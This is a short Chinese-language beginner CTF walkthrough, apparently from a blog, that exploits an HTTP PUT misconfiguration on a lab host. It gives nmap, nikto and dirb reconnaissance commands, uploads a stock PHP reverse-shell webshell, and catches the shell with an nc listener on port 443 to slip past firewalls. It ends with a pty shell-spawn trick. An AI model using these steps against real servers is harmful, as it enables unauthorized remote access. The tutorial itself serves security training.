6-10CTF夺旗入门教程--PUT漏洞

1.中间件PUT漏洞介绍

中间件包括apache、tomcat、IIS、weblogic等,这些中间件可以设置支持的HTTP方法。
通过PUT请求直接上传webshell到服务器对应目录

2.信息探测

#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.112
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.112
#探测敏感信息
nikto -host http://192.168.2.112
dirb http://192.168.2.112

3.深入挖掘

分析nmap、nikto扫描结果,分析挖掘可以利用的信息
查看http敏感页面
6-10CTF夺旗入门教程--PUT漏洞_第1张图片

4.漏洞扫描

owasp-zap web漏洞扫描器,自动挖掘web应用程序中的漏洞
6-10CTF夺旗入门教程--PUT漏洞_第2张图片

5.测试PUT漏洞

#对敏感目录进行测试
curl -v -X OPTIONS http://192.168.2.112/test

6-10CTF夺旗入门教程--PUT漏洞_第3张图片
利用PUT漏洞获取shell思路
上传webshell到服务器,之后通过对应的目录遍历路径访问webshell,执行webshell,获取反弹shell。

6.上传webshell

在test目录下直接使用浏览器插件Poster,上传webshell

#使用/usr/share/webshells/php/下的webshell
cp /usr/share/webshells/php/php-reverse-shell.php  shell.php

使用Poster上传shell.php
我的Firefox版本是60.8.0,在安装中没有找到poster插件,不知道是不是不支持了
所以直接用了视频截图,可以使用其他工具或者写个python脚本
6-10CTF夺旗入门教程--PUT漏洞_第4张图片
使用nc开启监听反弹shell

#如果是为了绕过防火墙 端口号是用443
nc -nlvp 端口
#启动终端
echo "import pty;pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

你可能感兴趣的:(CTF学习)